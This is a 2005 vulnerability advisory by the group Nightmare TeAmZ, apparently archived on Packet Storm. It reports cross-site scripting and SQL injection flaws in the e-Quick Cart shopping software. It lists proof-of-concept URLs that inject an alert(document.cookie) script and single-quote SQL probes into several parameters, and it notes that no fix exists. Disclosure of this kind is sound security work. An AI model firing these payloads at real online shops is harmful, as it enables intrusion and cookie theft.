e-Quick Cart is susceptible to multiple cross site scripting and SQL injection flaws. Exploitation details provided.
c0917d9be89c6bc5d4582e3cd2501515dc90fef1c4bbd7dc0cd3d650bec70897------------------------------------------------------
Nightmare TeAmZ Advisory 016
------------------------------------------------------
Date - 11/2005
e-Quick Cart Sql & Xss
AFFECTED PRODUCTS
=================
e-Quick Cart
http://www.cdmweb.com
Xss Poof:
========
www.[host].com/[path]/shopgift.asp?strgifttoname="><script>alert(document.cookie);</script>
www.[host].com/[path]/shopmaillist.asp?strfirstname="><script>alert(document.cookie);</script>
www.[host].com/[path]/shopprojectlogin.asp?strpid="><script>alert(document.cookie);</script>
www.[host].com/[path]/shoptellafriend.asp?Custname="><script>alert(document.cookie);</script>
Sql Poof:
========
www.[host].com/[path]/shopaddtocart.asp?quantity=1&Order=Order&productid='
www.[host].com/[path]/shopprojectlogin.asp?strpid=1&strpemail='
www.[host].com/[path]/shoptellafriend.asp??id='
Solution:
=========
No Solution At This Time
Credits
=======
This vulnerability was discovered and researched by
BiPi_HaCk of Nightmare TeAmZ
We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0
Site: http://www.NightmareSecurity.net <--IT Security Forum
_________________________________________________________________
Comunica in tempo reale http://messenger.msn.com/beta
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed